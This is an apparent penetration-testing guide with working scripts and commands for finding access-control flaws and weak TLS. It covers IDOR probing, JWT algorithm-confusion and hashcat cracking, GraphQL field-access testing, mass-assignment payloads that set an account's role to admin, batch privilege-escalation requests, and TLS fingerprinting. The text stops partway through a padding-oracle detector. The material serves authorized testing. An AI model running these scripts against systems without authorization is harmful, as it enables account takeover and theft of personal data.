Comprehensive Encyclopedia of Offensive Security Tools, Techniques, and Procedures
The OWASP Top 10 represents the most critical web application security risks, but defending against them requires understanding the attacker's toolkit. This comprehensive guide details professional-grade tools, advanced techniques, and operational procedures for testing each vulnerability category. We'll cover everything from basic reconnaissance to sophisticated exploitation chains, emphasizing authorized testing methodologies and real-world workflows.
Legal & Ethical Disclaimer: All tools and techniques described herein must be used only on systems you own or have explicit written authorization to test. Unauthorized testing is illegal and unethical. Always establish clear rules of engagement and scope before any security assessment.
Access control failures occur when an application does not properly enforce its authorization policies, allowing users to perform actions outside their intended permissions. Modern applications typically implement one or more of the following access control models:
- Discretionary Access Control (DAC): Resource owners control access (e.g., UNIX file permissions).
- Mandatory Access Control (MAC): System-enforced policies (e.g., SELinux, AppArmor).
- Role-Based Access Control (RBAC): Permissions are assigned to roles.
- Attribute-Based Access Control (ABAC): Policies are based on user/resource attributes.
# Advanced Burp configuration for access control testing
# Starts Burp Suite Professional with a saved project file and a configuration file.
java -jar burpsuite_pro.jar --project-file=project.burp --config-file=burp.cfg
# Burp configuration file (burp.cfg):
# NOTE(review): the block syntax below looks like illustrative pseudo-config;
# confirm the file format your Burp version actually loads via --config-file.
burp {
suite {
# Increase memory for large applications
# NOTE(review): JVM heap/GC flags are normally passed to `java` itself —
# confirm that a key inside the config file is honoured.
vmargs = "-Xmx8G -XX:+UseG1GC -XX:MaxGCPauseMillis=200"
}
proxy {
# Configure upstream proxy for corporate environments
upstream_proxy = "proxy.corp.com:8080"
# SSL interception
ssl {
certificate_export = "/certs/"
client_certificates = "/certs/client.p12"
}
}
scanner {
# Custom scan configurations
audit_depth = 10
audit_items = ["access_control", "idor"]
}
}
# Export project data for team collaboration
# NOTE(review): confirm that the installed Burp build accepts these export flags.
# The next section's heading used to be fused onto this command, which made
# "#" part of the --output value instead of starting a comment.
java -jar burpsuite_pro.jar --export-project --format=json --output=project_export.json
# ZAP Docker deployment for CI/CD integration
# Runs the ZAP baseline scan in a container. The current directory is mounted
# at /zap/wrk so gen.conf and the three report files live on the host.
# The volume argument is quoted so a working directory containing spaces is
# still passed to docker as a single argument.
# NOTE(review): confirm the image name against the ZAP Docker documentation;
# ZAP has published its images under more than one name.
docker run -v "$(pwd):/zap/wrk" -t owasp/zap2docker-stable zap-baseline.py \
    -t https://target.com \
    -g gen.conf \
    -r report.html \
    -J report.json \
    -w report.md
# ZAP automation script (zap_script.js)
// ZAP "HTTP Sender" script.
// Tags every outgoing request with a test identifier and, for /api/ requests,
// replaces the session cookie with the token of a second test account so that
// access-control enforcement can be checked.
var HttpSender = Java.type('org.parosproxy.paros.network.HttpSender')
var ScriptVars = Java.type('org.zaproxy.zap.extension.script.ScriptVars')

// Placeholder: substitute the session token of a second, authorized test account.
var REPLACEMENT_SESSION = "session=ATTACKER_SESSION_TOKEN"

/**
 * Invoked before each request is sent.
 *
 * @param msg       the HTTP message about to be sent
 * @param initiator numeric id of the component that created the request
 * @param helper    script helper object supplied by the host
 */
function sendingRequest(msg, initiator, helper) {
    var header = msg.getRequestHeader()

    // Add custom headers for all requests
    header.setHeader("X-Test-ID", "ACCESS-CTRL-2024")

    // String(...) yields a JavaScript string, so only indexOf/replace are used.
    // The original mixed Java-only contains() with ES6-only includes(), which
    // no single script engine is guaranteed to provide together.
    var uri = String(header.getURI().toString())
    if (uri.indexOf("/api/") === -1) {
        return
    }

    var rawCookies = header.getHeader("Cookie")
    if (rawCookies === null || rawCookies === undefined) {
        return
    }

    // Modify session tokens for testing (first "session=" pair only).
    var cookies = String(rawCookies)
    if (cookies.indexOf("session=") !== -1) {
        header.setHeader("Cookie", cookies.replace(/session=[^;]+/, REPLACEMENT_SESSION))
    }
}

/**
 * Invoked after each response is received. HTTP Sender scripts are expected to
 * define both callbacks; no response processing is needed here.
 */
function responseReceived(msg, initiator, helper) {
}
# ZAP API automation with Python
import time

import zapv2

TARGET = 'https://target.com'
ZAP_PROXY = 'http://127.0.0.1:8080'

# The target is HTTPS, so both schemes must be routed through the local ZAP proxy.
zap = zapv2.ZAPv2(apikey='your-api-key', proxies={'http': ZAP_PROXY, 'https': ZAP_PROXY})

# Spider with advanced configuration
zap.spider.set_option_max_depth(5)
zap.spider.set_option_thread_count(5)
scan_id = zap.spider.scan(TARGET)

# The spider runs asynchronously: poll its progress (a percentage string)
# before configuring the active scan.
while int(zap.spider.status(scan_id)) < 100:
    time.sleep(2)

# Active scan with custom policies
scan_policy = {
    'attackStrength': 'HIGH',
    'alertThreshold': 'MEDIUM',
    # NOTE(review): confirm these rule IDs against the installed scan rules.
    'scannerId': [40000, 40001]
}

# enable_scanners() takes a comma-separated string of rule IDs, not a dict;
# strength and threshold are set per rule.
zap.ascan.enable_scanners(','.join(str(rule_id) for rule_id in scan_policy['scannerId']))
for rule_id in scan_policy['scannerId']:
    zap.ascan.set_scanner_attack_strength(rule_id, scan_policy['attackStrength'])
    zap.ascan.set_scanner_alert_threshold(rule_id, scan_policy['alertThreshold'])
#!/usr/bin/env python3
"""
Advanced IDOR detector with pattern recognition
Detects sequential/numeric UUIDs, predictable patterns
"""
import re
import requests
from urllib.parse import urlparse, parse_qs
from collections import Counter
import json
import hashlib
class IDORDetector:
    """Probe a URL's query parameters for insecure direct object references.

    Each query parameter is classified by shape (numeric, UUID, ...), neighbouring
    values are generated for it, and every variant is requested with the
    configured session. Use only against systems you are authorized to test.
    """

    # Tried in insertion order with full-string matching, so the specific
    # shapes are listed before the permissive hex/base64 catch-alls.
    PARAM_PATTERNS = {
        'numeric': r'\b\d{1,10}\b',
        'uuid': r'[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}',
        'date': r'\d{4}-\d{2}-\d{2}',
        'hex': r'[0-9a-fA-F]{16,}',
        'base64': r'[A-Za-z0-9+/=]{20,}',
    }

    def __init__(self, target_url, session_cookies=None):
        """Store the target and build a requests session.

        Args:
            target_url: URL the detector was created for (kept as ``self.target``).
            session_cookies: optional mapping of cookies added to the session.
        """
        self.target = target_url
        self.session = requests.Session()
        if session_cookies:
            self.session.cookies.update(session_cookies)
        self.param_patterns = dict(self.PARAM_PATTERNS)

    def analyze_parameters(self, url):
        """Return ``{param_name: value_type}`` for the query string of *url*.

        When a parameter is repeated, the type of its last value wins.
        """
        query = parse_qs(urlparse(url).query)
        return {
            name: self.classify_value(values[-1])
            for name, values in query.items()
        }

    def classify_value(self, value):
        """Return the name of the first pattern matching the whole *value*.

        Full-string matching is required: with prefix matching a UUID or date
        that starts with digits is reported as ``numeric`` and later fails
        ``int()`` conversion.
        """
        for ptype, pattern in self.param_patterns.items():
            if re.fullmatch(pattern, value, re.IGNORECASE):
                return ptype
        return 'unknown'

    def generate_test_values(self, param_type, original_value):
        """Return candidate replacement values for a parameter.

        Numeric parameters get neighbouring and boundary integers, UUID
        parameters get five random UUIDs, every other type gets an empty list.
        Duplicates and the original value itself are dropped.
        """
        candidates = []
        if param_type == 'numeric':
            try:
                base = int(original_value)
            except ValueError:
                return []
            candidates = [
                str(base - 1), str(base + 1),
                str(base * 2), str(base // 2),
                '0', '-1', '999999999',
            ]
        elif param_type == 'uuid':
            import uuid
            candidates = [str(uuid.uuid4()) for _ in range(5)]
        # dict.fromkeys de-duplicates while keeping the generation order.
        return [v for v in dict.fromkeys(candidates) if v != original_value]

    def modify_param(self, url, param, new_value):
        """Return *url* with query parameter *param* set to *new_value*."""
        from urllib.parse import urlencode, urlunparse

        parsed = urlparse(url)
        query = parse_qs(parsed.query, keep_blank_values=True)
        query[param] = [new_value]
        return urlunparse(parsed._replace(query=urlencode(query, doseq=True)))

    def extract_indicators(self, text, sensitive_keywords=None):
        """Return the keywords that occur in *text*, compared case-insensitively."""
        haystack = text.lower()
        return [kw for kw in (sensitive_keywords or []) if kw.lower() in haystack]

    def is_sensitive_response(self, response, sensitive_keywords=None):
        """Decide whether *response* should be reported.

        Only HTTP 200 responses qualify. With keywords, at least one must occur
        in the body; without keywords every 200 is reported for manual review.
        """
        if response.status_code != 200:
            return False
        if not sensitive_keywords:
            return True
        return bool(self.extract_indicators(response.text, sensitive_keywords))

    def test_idor(self, url, sensitive_keywords=None):
        """Request *url* once per generated test value and collect findings.

        Args:
            url: URL whose query parameters are varied.
            sensitive_keywords: optional keywords that mark a response as sensitive.

        Returns:
            A list of dicts describing every flagged response.
        """
        results = []
        original_values = parse_qs(urlparse(url).query)
        for param, ptype in self.analyze_parameters(url).items():
            # Same "last value wins" rule as analyze_parameters().
            original_value = original_values[param][-1]
            for test_val in self.generate_test_values(ptype, original_value):
                test_url = self.modify_param(url, param, test_val)
                try:
                    response = self.session.get(test_url, timeout=10)
                except requests.RequestException:
                    # Best effort: one unreachable variant must not end the run.
                    continue
                if self.is_sensitive_response(response, sensitive_keywords):
                    results.append({
                        'parameter': param,
                        'original_value': original_value,
                        'test_value': test_val,
                        'status_code': response.status_code,
                        'response_length': len(response.text),
                        'indicators': self.extract_indicators(
                            response.text, sensitive_keywords
                        ),
                    })
        return results
# Usage
# NOTE: analyze_parameters() only inspects the query string, so the identifier
# under test has to be a query parameter for any probe to be generated.
detector = IDORDetector('https://api.target.com/user/123/profile')
# test_idor() takes the URL first; the keyword list is its second argument.
results = detector.test_idor(
    detector.target,
    sensitive_keywords=['SSN', 'credit_card', 'password'],
)
# JWT Toolkit (jwt_tool) advanced usage
# Install: git clone https://github.com/ticarpi/jwt_tool
# Comprehensive JWT attack
# The per-flag notes are listed here instead of after each backslash: in
# "\ # note" the backslash escapes the space and the comment ends the command,
# so none of the following options would be passed to jwt_tool.
# NOTE(review): confirm each flag's meaning against `python3 jwt_tool.py -h`.
#   -M at                                  All tests
#   -X a                                   Algorithm confusion
#   -k public.pem                          Public key for confusion
#   -d /usr/share/wordlists/rockyou.txt    Dictionary attack
#   -t http://target.com/api/user          Target for verification
#   -cv "email"                            Claim to verify
#   -rh "Authorization: Bearer {token}"    Request header format
#   -S                                     Generate SQLi payloads in claims
#   -pc "user_id"                          Target claim for manipulation
#   -pv "admin"                            Value to inject
#   -T                                     Tamper mode
#   -out crafted_jwt.txt                   Output crafted tokens
python3 jwt_tool.py eyJ0eXAiOiJKV1Qi... \
    -M at \
    -X a \
    -k public.pem \
    -d /usr/share/wordlists/rockyou.txt \
    -t http://target.com/api/user \
    -cv "email" \
    -rh "Authorization: Bearer {token}" \
    -S \
    -pc "user_id" \
    -pv "admin" \
    -T \
    -out crafted_jwt.txt
# JWT crack with hashcat
# First convert JWT to hashcat format
echo -n "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9" > header.txt
echo -n "eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ" > payload.txt
# For HS256
# NOTE(review): jwt.hash is not created by the commands above (they write
# header.txt and payload.txt) — confirm which file hashcat is meant to read.
hashcat -m 16500 jwt.hash wordlist.txt -O -w 4
# For RS256 public key extraction and misuse
python3 jwt_tool.py eyJ0eXAi... -X k -pk public_key.pem -pc payload_claim
# JWT automatic scanner integration
python3 jwt_automate.py \
    --target http://target.com \
    --wordlist jwt_secrets.txt \
    --threads 10 \
    --output results.json \
    --verify-endpoint /api/verify \
    --valid-keyword "success"
#!/usr/bin/env python3
"""
GraphQL authorization bypass tester
Tests for inadequate field-level permissions
"""
import requests
import json
import sys
from graphql import build_ast_schema, parse
from graphql.utilities import get_operation_ast
class GraphQLAuthTester:
    """Check whether a GraphQL endpoint enforces field-level authorization.

    The tester fetches the schema through introspection, lists fields whose
    names look sensitive, and replays a query under several bearer tokens to
    see which identities receive sensitive values. Use only against systems
    you are authorized to test.
    """

    # Substrings that mark a field or key name as potentially sensitive.
    SENSITIVE_KEYWORDS = (
        'password', 'email', 'ssn', 'credit', 'card',
        'admin', 'role', 'permission', 'token', 'secret',
        'salary', 'address', 'phone', 'birth',
    )

    # Introspection query; the text is kept exactly as in the original script.
    INTROSPECTION_QUERY = """
query IntrospectionQuery {
__schema {
queryType { name }
mutationType { name }
subscriptionType { name }
types {
...FullType
}
directives {
name
description
locations
args {
...InputValue
}
}
}
}
fragment FullType on __Type {
kind
name
description
fields(includeDeprecated: true) {
name
description
args {
...InputValue
}
type {
...TypeRef
}
isDeprecated
deprecationReason
}
inputFields {
...InputValue
}
interfaces {
...TypeRef
}
enumValues(includeDeprecated: true) {
name
description
isDeprecated
deprecationReason
}
possibleTypes {
...TypeRef
}
}
fragment InputValue on __InputValue {
name
description
type { ...TypeRef }
defaultValue
}
fragment TypeRef on __Type {
kind
name
ofType {
kind
name
ofType {
kind
name
ofType {
kind
name
ofType {
kind
name
}
}
}
}
}
"""

    def __init__(self, endpoint, headers=None, timeout=30):
        """Store connection settings.

        Args:
            endpoint: URL of the GraphQL endpoint.
            headers: optional base headers; defaults to a JSON content type.
            timeout: seconds to wait for each HTTP request.
        """
        self.endpoint = endpoint
        self.headers = headers or {'Content-Type': 'application/json'}
        self.timeout = timeout
        self.introspection_query = self.INTROSPECTION_QUERY

    def get_introspection(self):
        """Fetch GraphQL schema via introspection and return the decoded JSON."""
        response = requests.post(
            self.endpoint,
            json={'query': self.introspection_query},
            headers=self.headers,
            timeout=self.timeout,
        )
        return response.json()

    def _is_sensitive_name(self, name):
        """Return True when *name* contains one of the sensitive keywords."""
        lowered = str(name).lower()
        return any(keyword in lowered for keyword in self.SENSITIVE_KEYWORDS)

    def _iter_sensitive(self, node, path=''):
        """Yield ``(path, value)`` for non-empty values under sensitive keys."""
        if isinstance(node, dict):
            for key, value in node.items():
                child = f'{path}.{key}' if path else str(key)
                if self._is_sensitive_name(key) and value not in (None, '', [], {}):
                    yield child, value
                else:
                    yield from self._iter_sensitive(value, child)
        elif isinstance(node, list):
            for index, item in enumerate(node):
                yield from self._iter_sensitive(item, f'{path}[{index}]')

    @staticmethod
    def _payload(data):
        """Return the ``data`` member of a response dict, or *data* itself."""
        return data.get('data') if isinstance(data, dict) else data

    def contains_sensitive_data(self, data):
        """Return True when the response carries a value under a sensitive key."""
        return any(True for _ in self._iter_sensitive(self._payload(data)))

    def extract_sensitive_values(self, data):
        """Return ``{path: value}`` for every sensitive value in the response."""
        return dict(self._iter_sensitive(self._payload(data)))

    def extract_sensitive_fields(self, schema):
        """Identify potentially sensitive fields in an introspection result.

        Args:
            schema: decoded introspection response.

        Returns:
            A list of ``{'type', 'field', 'description'}`` dicts. A missing or
            null ``data``/``__schema``/``fields``/``description`` entry is
            treated as empty instead of raising.
        """
        types = ((schema.get('data') or {}).get('__schema') or {}).get('types') or []
        sensitive_fields = []
        for type_def in types:
            for field in type_def.get('fields') or []:
                if self._is_sensitive_name(field.get('name', '')):
                    sensitive_fields.append({
                        'type': type_def['name'],
                        'field': field['name'],
                        'description': field.get('description') or ''
                    })
        return sensitive_fields

    def test_field_level_access(self, query_template, user_tokens):
        """Run *query_template* once per token and report who sees sensitive data.

        Args:
            query_template: GraphQL query text sent unchanged for every token.
            user_tokens: mapping of a label to a bearer token.

        Returns:
            One entry per token whose HTTP 200 response contained sensitive values.
        """
        results = []
        for token_name, token_value in user_tokens.items():
            headers = self.headers.copy()
            headers['Authorization'] = f'Bearer {token_value}'
            response = requests.post(
                self.endpoint,
                json={'query': query_template},
                headers=headers,
                timeout=self.timeout,
            )
            if response.status_code != 200:
                continue
            data = response.json()
            # Check if sensitive data is present
            if self.contains_sensitive_data(data):
                results.append({
                    'user': token_name,
                    'has_access': True,
                    'data_exposed': self.extract_sensitive_values(data)
                })
        return results
# Usage
tester = GraphQLAuthTester('https://target.com/graphql')
schema = tester.get_introspection()
sensitive_fields = tester.extract_sensitive_fields(schema)
# Automated horizontal privilege escalation testing
#!/bin/bash
# Test user A accessing user B's resources
USER_A_TOKEN="eyJ0eXAi..."
USER_B_ID="456"
# Test endpoints with User A's token accessing User B's data
ENDPOINTS=(
    "/api/users/${USER_B_ID}/profile"
    "/api/orders?user_id=${USER_B_ID}"
    "/api/documents/${USER_B_ID}/files"
    "/api/messages/${USER_B_ID}"
)
for endpoint in "${ENDPOINTS[@]}"; do
    echo "Testing: $endpoint"
    # --fail: curl prints no body for HTTP errors, so jq receives no input.
    # jq -e: exit status is non-zero when the filter produces no output; without
    # -e jq exits 0 even when select() drops everything and every endpoint was
    # reported as vulnerable.
    # ".error?" keeps array responses from raising an indexing error.
    if curl -s --fail -H "Authorization: Bearer $USER_A_TOKEN" \
            "https://target.com$endpoint" \
            | jq -e 'select((.error? // null) == null)'; then
        echo "VULNERABLE: User A can access $endpoint"
    fi
    sleep 1
done
# Mass assignment testing with different user contexts
cat > mass_assignment_test.py << 'EOF'
import requests
import json


def test_mass_assignment(target_url, token_a, token_b, user_id=456):
    """Test if user can modify other users' attributes.

    token_a is only used to read the current record of user_id; token_b is the
    credential under test and is used for the modifying request.
    Returns True when the update request is answered with a 2xx status.
    """
    user_url = f'{target_url}/api/users/{user_id}'

    # Read the current record with token_a.
    reader_headers = {'Authorization': f'Bearer {token_a}'}
    current_record = requests.get(user_url, headers=reader_headers, timeout=10).json()

    # Attempt to change sensitive fields with token_b.
    tester_headers = {'Authorization': f'Bearer {token_b}'}
    payload = {
        'email': 'attacker@evil.com',
        'role': 'admin',
        'is_active': True,
        'permissions': ['read', 'write', 'delete']
    }
    # Merge with existing data so untouched fields keep their values.
    attack_payload = {**current_record, **payload}
    response = requests.put(
        user_url,
        json=attack_payload,
        headers=tester_headers,
        timeout=10,
    )
    # Any 2xx status counts as an accepted update.
    return 200 <= response.status_code < 300
EOF
# Batch request IDOR testing
import requests
import json
def test_batch_idor(target_url, session_token):
    """Test for IDOR in batch endpoints.

    Sends one batch request that mixes several user IDs and reports every
    sub-request answered with status 200.

    NOTE: the ``test_`` prefix means pytest collects this function if the
    module is imported into a test run.

    Args:
        target_url: base URL of the application (no trailing slash).
        session_token: bearer token of the account under test.

    Returns:
        The indexes of the sub-requests that succeeded (empty when the batch
        call itself was not answered with HTTP 200).
    """
    headers = {
        'Authorization': f'Bearer {session_token}',
        'Content-Type': 'application/json'
    }
    # Craft batch request with mixed user IDs
    batch_payload = {
        "requests": [
            {"method": "GET", "path": "/api/users/123/profile"},
            {"method": "GET", "path": "/api/users/456/profile"},  # Other user
            {"method": "GET", "path": "/api/users/789/profile"},
            {"method": "POST", "path": "/api/users/456/update", "body": {"role": "admin"}}
        ]
    }
    response = requests.post(
        f"{target_url}/api/batch",
        json=batch_payload,
        headers=headers,
        timeout=10,
    )
    succeeded = []
    if response.status_code != 200:
        return succeeded

    for i, resp in enumerate(response.json().get('responses', [])):
        if resp.get('status') != 200:
            continue
        # The body may already be decoded JSON; slicing a dict or list would
        # raise TypeError, so serialise it before truncating.
        body = resp.get('body', '')
        preview = body if isinstance(body, str) else json.dumps(body)
        print(f"Batch request {i} succeeded - potential IDOR")
        print(f"Response: {preview[:200]}")
        succeeded.append(i)
    return succeeded
# Test GraphQL batching for IDOR
# Raw string: the \" sequences must reach the JSON parser unchanged. In a
# normal string Python turns them into bare quotes, which ends the JSON string
# early and makes the whole document invalid.
graphql_batch = r"""
[
{"query": "query { user(id: 123) { email privateData } }"},
{"query": "query { user(id: 456) { email privateData } }"},
{"query": "mutation { updateUser(id: 456, input: {role: \"admin\"}) { id } }"}
]
"""
#!/bin/bash
# Advanced TLS scanner with detailed reporting
TARGET="example.com"
OUTPUT_DIR="./tls_audit_$(date +%Y%m%d_%H%M%S)"
# Every expansion below is quoted so a target or output path containing spaces
# or glob characters is passed as a single argument.
mkdir -p "$OUTPUT_DIR"
echo "[*] Starting comprehensive TLS audit for $TARGET"
# 1. SSL Labs-style comprehensive test
echo "[*] Running testssl.sh full audit"
./testssl.sh --openssl-timeout 5 --warnings batch --color 0 \
    --htmlfile "$OUTPUT_DIR/testssl_full.html" \
    --jsonfile "$OUTPUT_DIR/testssl_full.json" \
    "$TARGET"
# 2. Cipher suite enumeration with grading
echo "[*] Enumerating cipher suites with SSLScan"
# (--no-renegotiation was listed twice; once is enough.)
sslscan --no-failed --no-renegotiation --no-compression \
    --no-heartbleed --no-fallback \
    --xml="$OUTPUT_DIR/sslscan.xml" "$TARGET"
# 3. TLS version support with compatibility matrix
echo "[*] Testing TLS version support"
for version in ssl2 ssl3 tls1 tls1_1 tls1_2 tls1_3; do
    echo "Testing $version..."
    # stderr is merged in, so an option the local openssl rejects leaves an
    # empty result file.
    openssl s_client -connect "$TARGET:443" \
        "-$version" < /dev/null 2>&1 | grep -E "Protocol|Cipher|Secure Renegotiation" \
        > "$OUTPUT_DIR/tls_$version.txt"
done
# 4. Certificate transparency log checking
echo "[*] Checking certificate transparency logs"
curl -s "https://crt.sh/?q=%.$TARGET&output=json" | jq . > "$OUTPUT_DIR/cert_transparency.json"
# 5. OCSP stapling check
echo "[*] Testing OCSP stapling"
openssl s_client -connect "$TARGET:443" -status < /dev/null 2>&1 \
    | grep -A 17 "OCSP response" > "$OUTPUT_DIR/ocsp_response.txt"
# 6. Certificate chain validation
echo "[*] Validating certificate chain"
openssl s_client -showcerts -connect "$TARGET:443" < /dev/null 2>&1 \
    | awk '/BEGIN CERT/,/END CERT/ {print $0}' \
    > "$OUTPUT_DIR/certificate_chain.pem"
# Analyze each certificate in chain
# "openssl x509 -in" reads only the first certificate of a PEM bundle, so the
# bundle is wrapped into a PKCS#7 structure and every certificate is printed.
openssl crl2pkcs7 -nocrl -certfile "$OUTPUT_DIR/certificate_chain.pem" \
    | openssl pkcs7 -print_certs -text -noout \
    | grep -E "Subject:|Issuer:|Not Before:|Not After :|Signature Algorithm:|Public Key Algorithm:" \
    > "$OUTPUT_DIR/certificate_details.txt"
# 7. Check for weak signature algorithms
echo "[*] Checking for weak signature algorithms"
openssl s_client -connect "$TARGET:443" < /dev/null 2>&1 \
    | openssl x509 -text -noout | grep "Signature Algorithm" \
    | grep -E "sha1|md5" && echo "WEAK SIGNATURE ALGORITHM DETECTED"
# 8. Check for mixed content issues
echo "[*] Checking for mixed content"
curl -s "https://$TARGET" | grep -i "http://" | grep -v "http://$TARGET" \
    > "$OUTPUT_DIR/mixed_content.txt"
# 9. HSTS preload status
echo "[*] Checking HSTS configuration"
curl -sI "https://$TARGET" | grep -i strict-transport-security \
    > "$OUTPUT_DIR/hsts_headers.txt"
# 10. Generate comprehensive report
# The heredoc delimiter is unquoted on purpose: the $(...) substitutions below
# are expanded while the report is written.
cat > "$OUTPUT_DIR/report.md" << EOF
# TLS/SSL Security Audit Report
## Target: $TARGET
## Date: $(date)
## Executive Summary
$(./testssl.sh "$TARGET" --color 0 | grep -A 5 "Overall rating")
## Detailed Findings
### Certificate Information
$(cat "$OUTPUT_DIR/certificate_details.txt")
### Vulnerabilities Found
$(grep -i "vulnerable\|weak\|not offered" "$OUTPUT_DIR/testssl_full.html" | head -20)
### Recommendations
1. Disable weak cipher suites
2. Enable TLS 1.3
3. Implement proper HSTS headers
4. Ensure certificate transparency logging
EOF
echo "[+] Audit complete. Reports saved to $OUTPUT_DIR"
#!/usr/bin/env python3
"""
Advanced TLS fingerprinting tool
Identifies specific implementations (OpenSSL, NSS, Schannel, etc.)
"""
import socket
import ssl
import json
from dataclasses import dataclass
from typing import Dict, List
import hashlib
@dataclass
class TLSFingerprint:
    """Collect TLS handshake characteristics of a server and guess its TLS stack.

    Attributes are the host name, the TCP port and the connect timeout in seconds.
    """

    target: str
    port: int = 443
    timeout: int = 5

    def _client_context(self, ciphers, pinned_version=None):
        """Build a non-verifying client context, optionally pinned to one version.

        ``ssl.PROTOCOL_TLSv1*`` constants are deprecated; the supported way to
        force a protocol version is ``minimum_version``/``maximum_version``.
        """
        context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
        # Fingerprinting must not abort on untrusted or mismatched certificates.
        context.check_hostname = False
        context.verify_mode = ssl.CERT_NONE
        if pinned_version is not None:
            context.minimum_version = pinned_version
            context.maximum_version = pinned_version
        context.set_ciphers(ciphers)
        return context

    def get_tls_fingerprint(self):
        """Collect TLS handshake characteristics.

        Returns:
            A dict with one entry per tested protocol label (handshake details,
            or ``{'error': ...}`` when the handshake failed) plus a
            ``supported_ciphers`` list.
        """
        fingerprint = {}
        # Test different TLS versions
        tls_versions = [
            (ssl.TLSVersion.TLSv1, "TLSv1"),
            (ssl.TLSVersion.TLSv1_1, "TLSv1.1"),
            (ssl.TLSVersion.TLSv1_2, "TLSv1.2"),
            (None, "TLS"),  # Highest supported
        ]
        for version, name in tls_versions:
            try:
                context = self._client_context('ALL:COMPLEMENTOFALL', version)
                with socket.create_connection((self.target, self.port), self.timeout) as sock:
                    with context.wrap_socket(sock, server_hostname=self.target) as ssock:
                        cipher = ssock.cipher()
                        cert = ssock.getpeercert(binary_form=True)
                        session = ssock.session
                        fingerprint[name] = {
                            'cipher_suite': cipher[0],
                            'protocol_version': cipher[1],
                            'key_length': cipher[2],
                            'certificate_sha256': hashlib.sha256(cert).hexdigest() if cert else None,
                            # Hex text instead of raw bytes so the result can
                            # be dumped as JSON.
                            'session_id': session.id.hex() if session else None,
                            'session_reused': ssock.session_reused,
                            'compression': ssock.compression()
                        }
            except (OSError, ValueError) as e:
                # ssl.SSLError and socket timeouts are OSError subclasses.
                fingerprint[name] = {'error': str(e)}
        # Get all supported ciphers
        fingerprint['supported_ciphers'] = self.get_supported_ciphers()
        return fingerprint

    def get_supported_ciphers(self):
        """Return the candidate cipher suites the server accepts over TLS 1.2."""
        cipher_list = [
            'ECDHE-RSA-AES256-GCM-SHA384',
            'ECDHE-ECDSA-AES256-GCM-SHA384',
            'ECDHE-RSA-AES256-SHA384',
            'ECDHE-ECDSA-AES256-SHA384',
            'ECDHE-RSA-AES256-SHA',
            'ECDHE-ECDSA-AES256-SHA',
            'SRP-DSS-AES-256-CBC-SHA',
            'SRP-RSA-AES-256-CBC-SHA',
            # ... extensive cipher list
        ]
        accepted = []
        for cipher in cipher_list:
            try:
                context = self._client_context(cipher, ssl.TLSVersion.TLSv1_2)
                with socket.create_connection((self.target, self.port), self.timeout) as sock:
                    with context.wrap_socket(sock, server_hostname=self.target) as ssock:
                        if ssock.cipher()[0] == cipher:
                            accepted.append(cipher)
            except OSError:
                # Unknown cipher name, refused handshake or network error:
                # this suite is simply not counted.
                continue
        return accepted

    def identify_implementation(self, fingerprint):
        """Identify TLS implementation based on fingerprint.

        Each supported cipher that an implementation lists scores 1; each
        characteristic name found in the textual form of *fingerprint* scores 2.

        Returns:
            ``(implementation, score)`` tuples with a positive score, highest first.
        """
        implementations = {
            'OpenSSL': {
                'characteristics': ['supports_tls_fallback_scsv', 'session_ticket_ext'],
                'ciphers': ['ECDHE-RSA-AES256-GCM-SHA384', 'DHE-RSA-AES256-GCM-SHA384']
            },
            'NSS (Mozilla)': {
                'characteristics': ['supports_signed_cert_timestamps', 'ec_point_formats'],
                'ciphers': ['ECDHE-RSA-AES256-GCM-SHA384', 'ECDHE-ECDSA-AES256-GCM-SHA384']
            },
            'Schannel (Windows)': {
                'characteristics': ['tls_ext_ms', 'tls_ext_reneg'],
                'ciphers': ['TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384']
            },
            'BoringSSL (Google)': {
                'characteristics': ['google_pinning', 'tls_ext_signed_cert'],
                'ciphers': ['TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384']
            }
        }
        supported = fingerprint.get('supported_ciphers', [])
        as_text = str(fingerprint)  # loop-invariant, computed once
        matches = []
        for impl, traits in implementations.items():
            score = sum(1 for cipher in traits['ciphers'] if cipher in supported)
            score += sum(2 for trait in traits['characteristics'] if trait in as_text)
            if score > 0:
                matches.append((impl, score))
        return sorted(matches, key=lambda x: x[1], reverse=True)
# Usage
fingerprinter = TLSFingerprint("example.com")
fingerprint = fingerprinter.get_tls_fingerprint()
implementations = fingerprinter.identify_implementation(fingerprint)
#!/usr/bin/env python3
"""
Padding Oracle Attack Detector
Tests for vulnerable CBC mode implementations
"""
import requests
import time
from base64 import b64encode, b64decode
from Cryptodome.Cipher import AES
from Cryptodome.Util.Padding import pad, unpad
class PaddingOracleDetector:
    """Detect whether an endpoint reveals CBC padding validity.

    The detector only compares status codes, error text and response times for
    valid, tampered and random ciphertexts; it does not attempt decryption.
    Use only against systems you are authorized to test.
    """

    def __init__(self, target_url, ciphertext_param='cipher', timeout=10):
        """Store the endpoint, the query parameter that carries the ciphertext
        and the per-request timeout in seconds."""
        self.target_url = target_url
        self.cipher_param = ciphertext_param
        self.block_size = 16  # AES block size
        self.timeout = timeout

    def send_ciphertext(self, ciphertext):
        """GET the target with *ciphertext* in the configured query parameter."""
        return requests.get(
            self.target_url,
            params={self.cipher_param: ciphertext},
            timeout=self.timeout,
        )

    def modify_last_byte(self, ciphertext):
        """Return *ciphertext* with its final byte changed.

        Base64 input is decoded, the last byte is XOR-ed with 0x01 and the
        result re-encoded. Input that is not valid Base64 gets its last
        character replaced instead.
        """
        if not ciphertext:
            return ciphertext
        try:
            raw = bytearray(b64decode(ciphertext, validate=True))
        except ValueError:  # binascii.Error is a ValueError subclass
            replacement = 'B' if ciphertext[-1] == 'A' else 'A'
            return ciphertext[:-1] + replacement
        if not raw:
            return ciphertext
        raw[-1] ^= 0x01
        return b64encode(bytes(raw)).decode('ascii')

    def generate_random_ciphertext(self, blocks=2):
        """Return *blocks* random cipher blocks, Base64-encoded."""
        import os

        return b64encode(os.urandom(self.block_size * blocks)).decode('ascii')

    def test_oracle(self, ciphertext):
        """Test if server behaves as a padding oracle.

        Sends the given ciphertext, a tampered copy, a random one and a
        truncated one, and returns one observation dict per request.
        """
        test_cases = [
            # Valid ciphertext (should return 200)
            ciphertext,
            # Modified last byte (might cause padding error)
            self.modify_last_byte(ciphertext),
            # Completely random ciphertext
            self.generate_random_ciphertext(),
